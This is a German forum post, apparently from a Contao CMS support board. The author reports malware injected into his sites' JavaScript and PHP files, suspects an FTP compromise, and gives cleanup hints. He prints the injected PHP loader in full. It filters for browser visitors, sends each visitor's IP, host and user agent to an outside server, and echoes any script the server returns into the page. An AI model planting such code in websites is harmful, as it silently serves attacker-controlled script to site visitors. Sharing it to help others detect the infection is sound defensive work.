Hi.
Das Ding hatte ich letztens auch drin... und zwar in so ziemlich allen JS Dateien der ersten und zweiten Ebene der Installation(en).
Ebenso mal alle index.php, page.php, main.php checken... bei mir war da meist irgendwo sowas hier drin:
PHP-Code:
<?php
#11cdd2#
error_reporting(0); ini_set('display_errors',0); $wp_wkmma7 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wkmma7) && !preg_match ('/bot/i', $wp_wkmma7))){
$wp_wkmma097="http://"."tag"."modules".".com/modules"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wkmma7);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wkmma097);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_7wkmma = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_7wkmma,1,3) === 'scr' ){ echo $wp_7wkmma; }
#/11cdd2#
?>
Keine Ahnung ob die Sachen im Zusammenhang stehen, die Dateien wurden aber an unterschiedlichen Tagen kompromitiert.
Contao Check (neu installieren) sollte schonmal einiges an Info liefern.
Kommt aber keinesfalls über Contao, sondern übern FTP.
Kein besonders gutes Gefühl, da ich die Schwachstelle leider nicht genau lokalisieren konnte. Für mich war das unter anderem auch Anlass die letzten Reste von Filezilla vom Rechner zu fegen.
Gruß
Thomas
Lesezeichen